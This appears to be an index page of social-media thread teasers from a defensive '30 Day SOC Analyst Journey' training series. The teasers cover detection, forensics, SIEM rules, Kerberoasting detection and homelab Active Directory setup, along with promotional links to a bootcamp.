How to setup effective computer interrogation 🖥️ 🔍 🕵️‍♀️ - a 🧵: Hey friends - in this thread we will walk through the setup of zentral to allow you to query all your endpoints at once using only SQL

ready, set - GO: MAGIC 🪄✨

If you work in Tech/IT/Security today everyone is talking about TeamViewer.

Wanna know what happened and how you can easily triage cases like this in the future as a SOC Analyst?

Allow me to share, a 🧵: The TeamViewer Application is used by IT Professionals and everyone who lives far away from home but still has to deal with their families’ IT problems.

It allows you to remotely login to any computer that shares some session information with you.

The easiest way to start with Cybersecurity: Imagine the following situation:

WOHOOOOOO - YOU WON 🥇🏆

You have your first day as the new security person.

Congratulations, this journey was not easy but you made it anyway! 🚀🎉

Walkthrough 🚶🚶‍♀️🚶‍♂️ - What does all of this mean and why should I care?! In the last post I shared the screenshot above with you ⬆️

& wanted to know what you would do if you see this after an alert was triggered when a new account logged into one of the machines in your company network

Day 2️⃣7️⃣

MITRE ATT&CK Framework for brainiacs 🧠 and other cyber stars🌟: Imagine you are a glorious SOC Analyst working on a beautiful new case after the following alert has been thrown:

Day 2️⃣6️⃣

Detecting Brute Force attacks are very common lateral movement / initial access vectors because humans are inherently bad at remembering long complex passwords.
💡 What is the difference between brute-force, password spraying and credential stuffing?

Day 2️⃣5️⃣

Detecting Network Behaviour of Hackers with IDS: We oftentimes want to detect attackers based on their actions

& one tool that allows us to do just that is an Intrusion Detection System (IDS).

IDS is software that is checking network traffic on a packet level and compares it to predefined/custom rules.

Day 2️⃣4️⃣ - How the Windows Event Log System works: During the 30 Day Practical SOC Analyst Training you have set up your local SIEM to learn more about alerts & attack detection

wanna join?!
academy.maikroservice.com/p/30-day-soc-a…

Linux Log Files and where to find them: First up - are you ready to become a full fledged cyber professional?

Maybe even a Security Analyst or Security Operations Center Analyst?

Good - I have just the thing for you - sign up now for the bootcamp waitlist at:
maikroservice.com/waitlist

Day 2️⃣2️⃣
How to join Computers to your Domain - Windows & Linux: Wonderful, you made it.

I was hoping you would join me for Part II of "Your HomeLab AD Domain"

You did not see Part 1?!

Look here:

https://twitter.com/2477324742/status/1740885666341220605

Day 2️⃣1️⃣
How to setup AD in your HomeLab: Today we try something new - for the TLDR; folks,
have a look at the visual of the thread:



This way you can have a birds-eye view first on pinterest and then come back for details once you are ready - I hope it helps.pinterest.de/pin/1065171749…

Day 2️⃣0️⃣ of Your 30 Day SOC Analyst Journey

How to detect Windows Attacks - Kerberoasting: Kerberoasting is one of the quickest way for an attacker to get password hashes and try to crack them to get to the passwords

It is based on a “feature” that essentially allows anyone to request a ticket (TGS) from the domain controller without knowing the users password

Day 1️⃣9️⃣ of Your 30 Day SOC Analyst Journey

The Art of Memory Forensics explained for Beginners: Let’s continue our Story - shall we!?

Day 1️⃣8️⃣ of Your 30 Day SOC Analyst Journey

How to analyze computer snapshots: To make sure we are all on the same page

Yesterday we learned how to create a snapshot of a potentially compromised machine:

Today we will use a snapshot from the internet just so that we are all on the same page.

https://twitter.com/2477324742/status/1737607754766774308

Day 1️⃣7️⃣ of Your 30 Day SOC Analyst Journey
How to get started with Digital Forensics: Digital Forensics, the stuff you always dreamed about since CSI Miami.

What is Digital Forensics?, you ask

Let me tell you a story.

Day 1️⃣6️⃣ of Your 30 Day SOC Analyst Journey
How to write custom SIEM rules for PowerShell Commands: You want to hunt down attackers when they use the most powerful tool available on Windows systems?

You need to know how to write custom PowerShell rules to do just that - it all starts with PowerShell logs.

Day 1️⃣5️⃣ of Your 30 Day SOC Analyst Journey
Behavior-based detection 💙 - 10x better than signatures: Most of the people (55%) who read this have not yet followed @maikroservice -

If you learn something today - I would kindly ask you to smash that follow button so that I can make sure to produce high quality engaging content that teaches you new things regularly.

Thank you

Day 1️⃣4️⃣ of Your SOC Analyst Journey

How to DELETE malware 🦠 automagically 🪄✨: Dear fellow cyber witches and wizards - today your initiation ceremony into the ranks of high cyber council is commencing - I shall be your guide into the world of automagic

GO be a HERO!

Day 1️⃣3️⃣ of Your SOC Analyst Journey

Automatic detection of malware: In the last threads we walked through

FIM - File Integrity Monitoring,
Signature-based detection via YARA
and your first detection rules

Day 1️⃣2️⃣ of Your SOC Analyst Journey

📜 For Beginners - How to start using Signature-based Detection for Malware: 🚨 We are still in crisis-mode. 🚨

In the last threads we went through a simulated incident that snatched you off of your comfy 🛋️ and right into 🔥🧑‍🚒 fire extinguisher mode at your company

Day 1️⃣1️⃣ of Your SOC Analyst Journey

How to use File Integrity Monitoring to detect hacker: Since we want to talk about File Integrity Monitoring we need to talk about Indicators of Compromise

Lets break down what “compromise” actually means shall we?

We will look at two scenarios: